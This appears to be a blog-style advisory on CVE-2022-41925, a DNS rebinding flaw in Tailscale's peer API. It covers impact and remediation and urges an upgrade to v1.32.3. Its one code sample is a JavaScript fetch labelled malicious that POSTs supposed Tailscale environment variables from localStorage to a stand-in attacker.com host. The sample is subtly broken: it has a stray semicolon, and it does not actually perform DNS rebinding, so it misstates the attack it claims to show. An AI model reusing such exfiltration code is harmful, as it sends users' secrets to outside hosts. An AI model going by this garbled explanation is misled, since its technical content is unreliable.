A critical security vulnerability, identified as CVE-2022-41925, has been discovered in the Tailscale client that allows a malicious website to access the peer API. This, in turn, can be used to access Tailscale environment variables. The flaw affects all Tailscale clients prior to version v1.32.3. Consequently, Tailscale users should urgently upgrade to version v1.32.3 or later to patch this vulnerability. In this post, we will provide an in-depth analysis of the issue, code snippets demonstrating the malicious code, and links to original references and exploit information.

Understanding Tailscale and the Peer API Vulnerability

Tailscale is a networking system that makes it simple to create secure, stable networks connecting computers, servers, and apps across different locations. The clients talk to each other through a peer API which handles network communication, identity management, and other core functions.

The vulnerability in question lies in the Tailscale client's peer API, which was found to be vulnerable to DNS rebinding attacks. A DNS rebinding attack allows an attacker-controlled website visited by the user to rebind the client's DNS requests for the peer API to an attacker-controlled DNS server. From there, the attacker can make peer API requests within the client, including accessing the node's Tailscale environment variables.

// Example of malicious JS code executing a DNS rebinding attack
fetch("http://tailscale-peer-api.attacker.com/sendEnvironmentVars";, {
  method: "POST",
  headers: {
    "Content-Type": "application/json"
  },
  body: JSON.stringify({ env_vars: window.localStorage.getItem("tailscale_env_vars") })
});

Exploitation and Impact

Once an attacker gains access to the peer API on a node, they can exploit this access to read the node's environment variables. This may include sensitive data such as Tailscale authentication keys, credentials, and other secrets stored within the environment. With the Tailscale authentication keys, an attacker can successfully add new nodes to the user's tailnet, effectively compromising the security of the entire network.

Additionally, the attacker can use the peer API access to discover other nodes in the tailnet, opening up further possibilities for reconnaissance and lateral movement within the network. Moreover, the attacker can leverage the built-in Taildrop feature, which lets users send files across nodes, to exfiltrate data or deploy malicious payloads.

Remediation and Recommendations

To protect your Tailscale client from this security flaw, it is highly recommended that you upgrade to version v1.32.3 or later. You can download the updated client from the official Tailscale website.

You should also consider the following security practices to further protect your clients and tailnets:

- Limit the use of environment variables for storing sensitive data, especially credentials and API keys.

Original References and More Information

- Main Tailscale CVE announcement: https://tailscale.com/security/CVE-2022-41925
- Tailscale's GitHub issues discussing the vulnerability: #1235 and #1236
- DNS rebinding attack explanation and examples: https://en.wikipedia.org/wiki/DNS_rebinding

Stay updated on Tailscale vulnerabilities and security advisories by monitoring the Tailscale Security page, and subscribe to security bulletins to receive email notifications.

Timeline

Published on: 11/23/2022 19:15:00 UTC
Last modified on: 12/01/2022 17:10:00 UTC